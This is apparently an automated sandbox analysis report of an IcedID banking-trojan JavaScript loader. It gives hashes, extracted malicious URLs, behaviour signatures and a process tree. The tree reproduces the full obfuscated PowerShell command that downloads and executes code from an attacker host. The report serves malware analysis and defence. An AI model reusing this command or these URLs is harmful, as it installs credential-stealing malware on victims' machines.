icedid | ef80d34f4f1f4ff1d809848a3dc59f489ba8321f7835ba63760c1a44c0869c6b

Analysis

max time kernel
135s
max time network
139s
platform
windows7_x64
resource
win7-20230220-en
resource tags

arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system
submitted
16/03/2023, 18:01

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

Request_980387_March_16.js
Size

11KB
MD5

f7620e8393de1892407a64fd6c4fb37e
SHA1

27a75e63ca29e149d206e2b7649355d4663af36e
SHA256

ef80d34f4f1f4ff1d809848a3dc59f489ba8321f7835ba63760c1a44c0869c6b
SHA512

989965670351d5104b5d60386b8624ddf95d8ad36400eed35e639c4561e7a558c42501cc346028c9c20a8538d286b6cfb21fd7840d9a7142719a7db756934fd0
SSDEEP

192:0uX4cOkYAxdB2sBIiRsJRhI21/CG/E25k2tc6aqhJfSjW9uavQcLtRyUlml8naKM:1pOsdB24hajhspN2ebqhtSqrLmamliM

Score

10^/10

icedid 2171387498 banker loader trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

http://aproshak.top/gatef1.php

Extracted

Family

icedid

Campaign

2171387498

avroralikhaem.com

Signatures

IcedID, BokBot
IcedID is a banking trojan capable of stealing credentials.
trojan banker icedid

Blocklisted process makes network request 5 IoCs

flow	pid	Process
4	1292	powershell.exe
5	1292	powershell.exe
7	904	rundll32.exe
9	904	rundll32.exe
10	904	rundll32.exe

Downloads MZ/PE file

Loads dropped DLL 1 IoCs

pid	Process
904	rundll32.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
1292	powershell.exe
904	rundll32.exe
904	rundll32.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	1292	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 1408 wrote to memory of 656	1408	wscript.exe	27
PID 1408 wrote to memory of 656	1408	wscript.exe	27
PID 1408 wrote to memory of 656	1408	wscript.exe	27
PID 656 wrote to memory of 1292	656	cmd.exe	29
PID 656 wrote to memory of 1292	656	cmd.exe	29
PID 656 wrote to memory of 1292	656	cmd.exe	29
PID 1292 wrote to memory of 904	1292	powershell.exe	30
PID 1292 wrote to memory of 904	1292	powershell.exe	30
PID 1292 wrote to memory of 904	1292	powershell.exe	30

C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\Request_980387_March_16.js
1⤵
- Suspicious use of WriteProcessMemory
PID:1408
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c pOwersHEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYQBwAHIAbwBzAGgAYQBrAC4AdABvAHAALwBnAGEAdABlAGYAMQAuAHAAaABwACIAKQA=
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:656
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    pOwersHEll -nop -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYQBwAHIAbwBzAGgAYQBrAC4AdABvAHAALwBnAGEAdABlAGYAMQAuAHAAaABwACIAKQA=
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1292
  - - C:\Windows\System32\rundll32.exe
      "C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Local\Temp\NziXYd.dat init
      4⤵
      Blocklisted process makes network request
      Loads dropped DLL
      Suspicious behavior: EnumeratesProcesses
      PID:904

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\NziXYd.dat

Filesize
425KB

MD5
47fc7775d368ebe67b4b27c7913a4e11

SHA1
3f6fe6225400285a0e05950dfabae9a6ba858ed3

SHA256
8bef7c5f74640080536d669c15629c4c720bc081c1f72505eed8c3b87fd5f915

SHA512
9534c47ee2738e3000489a9df2bd8bda64c7c9b5459e70c9b3e1dbacfc6a7bb00884f845290aa7f361e03ff68409ba1839d9748453b46ae0beb0da04a8ad6a2f

Download Submit
\Users\Admin\AppData\Local\Temp\NziXYd.dat

Filesize
425KB

MD5
47fc7775d368ebe67b4b27c7913a4e11

SHA1
3f6fe6225400285a0e05950dfabae9a6ba858ed3

SHA256
8bef7c5f74640080536d669c15629c4c720bc081c1f72505eed8c3b87fd5f915

SHA512
9534c47ee2738e3000489a9df2bd8bda64c7c9b5459e70c9b3e1dbacfc6a7bb00884f845290aa7f361e03ff68409ba1839d9748453b46ae0beb0da04a8ad6a2f

Download Submit
memory/904-68-0x0000000000130000-0x0000000000139000-memory.dmp

Filesize
36KB

Download
memory/904-75-0x0000000002660000-0x00000000026E0000-memory.dmp

Filesize
512KB

Download
memory/904-76-0x0000000002660000-0x00000000026E0000-memory.dmp

Filesize
512KB

Download
memory/1292-59-0x000000001B000000-0x000000001B2E2000-memory.dmp

Filesize
2.9MB

Download
memory/1292-60-0x0000000001EE0000-0x0000000001EE8000-memory.dmp

Filesize
32KB

Download
memory/1292-61-0x0000000002660000-0x00000000026E0000-memory.dmp

Filesize
512KB

Download
memory/1292-62-0x0000000002660000-0x00000000026E0000-memory.dmp

Filesize
512KB

Download
memory/1292-63-0x0000000002660000-0x00000000026E0000-memory.dmp

Filesize
512KB

Download
memory/1292-64-0x0000000002660000-0x00000000026E0000-memory.dmp

Filesize
512KB

Download